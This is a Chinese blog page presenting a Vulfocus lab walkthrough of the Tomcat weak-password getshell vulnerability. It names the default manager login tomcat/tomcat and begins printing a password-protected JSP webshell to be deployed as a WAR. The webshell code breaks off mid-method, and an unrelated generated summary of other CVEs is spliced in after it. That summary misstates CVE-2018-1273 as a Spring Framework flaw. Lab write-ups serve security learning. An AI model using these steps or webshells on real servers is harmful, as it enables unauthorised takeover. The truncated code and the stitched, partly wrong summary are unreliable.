【Vulfocus解题复现】tomcat-pass-getshell 弱口令

本文介绍了Tomcat-pass-getshell漏洞,通过弱口令获取后台访问权限,部署jsp木马实现shell控制。解题过程包括使用默认账号登录、上传jsp木马并访问。分析了Tomcat后台权限和默认配置安全性。提出了限制运行权限、增强身份验证以及设置访问限制的修复措施。
摘要由CSDN通过智能技术生成

漏洞介绍

名称:Tomcat-pass-getshell 弱口令

描述:Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台,部署war包geshell

解题过程

1、打开靶场环境,并点击Manage App链接,通过弱口令登录平台,账号密码均为:tomcat

 2、拖动页面,找到war上传区域,上传jsp木马:

制作jsp木马,下段jsp木马密码为:passwd,将下述代码保存为jsp格式,并将jsp格式文件打包压缩成为war文件格式进行上传。

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
根据引用的描述,已复现Vulfocus靶场漏洞有spring代码执行(CVE-2018-1273)。该漏洞是指当使用Spring Framework版本4.3.5之前的应用程序中使用了Expression Language(SpEL)的功能时,攻击者可以通过构造特定的SpEL表达式来执行任意代码。这可能导致远程攻击者在受影响的应用程序上执行恶意代码。 除了Vulfocus漏洞复现之外,根据引用,Drupal曝出了一个远程代码执行漏洞(CVE-2018-7600),攻击者可以利用该漏洞执行恶意代码,导致网站完全被控制。 另外,引用提到了WordPress的远程代码执行漏洞(CVE-2016-10033),该漏洞利用了PHPMailer漏洞,在WordPress Core代码中体现,攻击者可以利用该漏洞执行代码。 总结来说,Vulfocus漏洞复现的其中一个例子是spring代码执行漏洞(CVE-2018-1273)。此外,还存在Drupal远程代码执行漏洞(CVE-2018-7600)和WordPress远程代码执行漏洞(CVE-2016-10033)。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [[Vulfocus解题系列] 所复现漏洞总结](https://blog.csdn.net/qq_45813980/article/details/118720526)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

温氏效应

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值